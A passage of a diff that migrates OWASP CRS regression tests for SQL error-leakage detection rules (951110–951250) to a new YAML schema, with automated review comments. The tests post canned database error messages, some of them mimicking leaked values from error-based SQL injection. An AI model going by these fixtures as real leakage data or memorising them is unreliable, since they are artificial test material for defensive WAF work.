"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} + output: + log: + expect_ids: [951110] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index 1c9318b..84bc18f 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml 
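Review bot: The `meta.description` line is dropped here and in the 951120–951240 hunks below, but the otherwise identical 951150 hunk keeps `description: "Regression tests for rule 951150"`, so the migrated files now disagree on whether that key belongs to the new schema. Either restore `description: "Regression tests for rule 951110"` (and the matching line in the other files) or remove it from 951150 as well, so a schema validator treats all of them the same way. Separately, every 951xxx file carries only a positive case; a benign response body asserted with `no_expect_ids` would guard the leakage regex against false positives, though that is outside the scope of this format migration.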
@@ -1,29 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951120.yaml" - description: "Regression tests for rule 951120" +rule_id: 951120 tests: - - test_title: 951120-1 + - test_id: 1 desc: "Matching Oracle SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} - - output: - log_contains: "id \"951120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} + output: + log: + expect_ids: [951120] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index a7c83ef..beb26bb 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951130.yaml" - description: "Regression tests for rule 951130" +rule_id: 951130 tests: - - test_title: 951130-1 + - test_id: 1 desc: "Matching DB2 SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} - output: - log_contains: "id \"951130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} + output: + log: + expect_ids: [951130] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index c550314..25fcdcf 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951140.yaml" - description: "Regression tests for rule 951140" +rule_id: 951140 tests: - - test_title: 951140-1 + - test_id: 1 desc: "Matching EMC SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} - output: - log_contains: "id \"951140\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} + output: + log: + expect_ids: [951140] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml index 2e02f92..161aaea 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml 
@@ -1,28 +1,27 @@ --- meta: author: "azurit" - enabled: true - name: "951150.yaml" description: "Regression tests for rule 951150" +rule_id: 951150 tests: - - test_title: 951150-1 + - test_id: 1 desc: "Matching firebird SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} - output: - log_contains: "id \"951150\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} + output: + log: + expect_ids: [951150] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index 088e2d3..c923339 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951160.yaml" - description: "Regression tests for rule 951160" +rule_id: 951160 tests: - - test_title: 951160-1 + - test_id: 1 desc: "Matching Frontbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} - output: - log_contains: "id \"951160\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} + output: + log: + expect_ids: [951160] 
diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index 60ad4b9..85bcf4a 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951170.yaml" - description: "Regression tests for rule 951170" +rule_id: 951170 tests: - - test_title: 951170-1 + - test_id: 1 desc: "Matching hsqldb SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} - output: - log_contains: "id \"951170\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} + output: + log: + expect_ids: [951170] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index 7ac83ba..57f2cdc 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951180.yaml" - description: "Regression tests for rule 951180" +rule_id: 951180 tests: - - test_title: 951180-1 + - test_id: 1 desc: "Matching informix SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} - output: - log_contains: "id \"951180\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} + output: + log: + expect_ids: [951180] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index b1ca7c7..d717ef4 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951190.yaml" - description: "Regression tests for rule 951190" +rule_id: 951190 tests: - - test_title: 951190-1 + - test_id: 1 desc: "Matching ingres SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} - output: - log_contains: "id \"951190\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} + output: + log: + expect_ids: [951190] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index a190b55..ee8a310 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951200.yaml" - description: "Regression tests for rule 951200" +rule_id: 951200 tests: - - test_title: 951200-1 + - test_id: 1 desc: "Matching interbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} - output: - log_contains: "id \"951200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} + output: + log: + expect_ids: [951200] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index f65083e..2823970 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951210.yaml" - description: "Regression tests for rule 951210" +rule_id: 951210 tests: - - test_title: 951210-1 + - test_id: 1 desc: "Matching maxDB SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} - output: - log_contains: "id \"951210\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} + output: + log: + expect_ids: [951210] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index 18d37f4..b66b43f 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml 
@@ -1,50 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951220.yaml" - description: "Regression tests for rule 951220" +rule_id: 951220 tests: - - test_title: 951220-1 + - test_id: 1 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} - output: - log_contains: "id \"951220\"" - - - test_title: 951220-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. 
(severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} + output: + log: + expect_ids: [951220] + - test_id: 2 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} - output: - log_contains: "id \"951220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} + output: + log: + expect_ids: [951220] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 972e41e..ee66a9d 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml 
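Review bot: Both tests in this file carry the same `desc: "Matching mssql SQL Information Leakage"`, so a failure report cannot tell the syntax-error case (test_id 1) from the type-conversion case (test_id 2); the same duplication appears in the 951230 and 951240 hunks below. With `test_title` gone and only the numeric `test_id` left, the description is now the only human-readable identifier of a test, so something like `desc: "Matching mssql SQL Information Leakage (conversion failed message)"` for test_id 2 would make reports self-explanatory.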
@@ -1,49 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951230.yaml" - description: "Regression tests for rule 951230" +rule_id: 951230 tests: - - test_title: 951230-1 + - test_id: 1 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} - output: - log_contains: "id \"951230\"" - - test_title: 951230-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} + output: + log: + expect_ids: [951230] + - test_id: 2 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: 
"/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} - output: - log_contains: "id \"951230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} + output: + log: + expect_ids: [951230] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index f878fd1..802915f 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml 
@@ -1,49 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951240.yaml" - description: "Regression tests for rule 951240" +rule_id: 951240 tests: - - test_title: 951240-1 + - test_id: 1 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} - output: - log_contains: "id \"951240\"" - - test_title: 951240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} + output: + log: + expect_ids: [951240] + - test_id: 2 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} - output: - log_contains: "id \"951240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} + output: + log: + expect_ids: [951240] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index f711ff8..ebc1c43 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951250.yaml" - description: "Regression tests for rule 951250" +rule_id: 951250 tests: - - test_title: 951250-1 + - test_id: 1 desc: "Matching SQLite SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} - output: - log_contains: "id \"951250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: 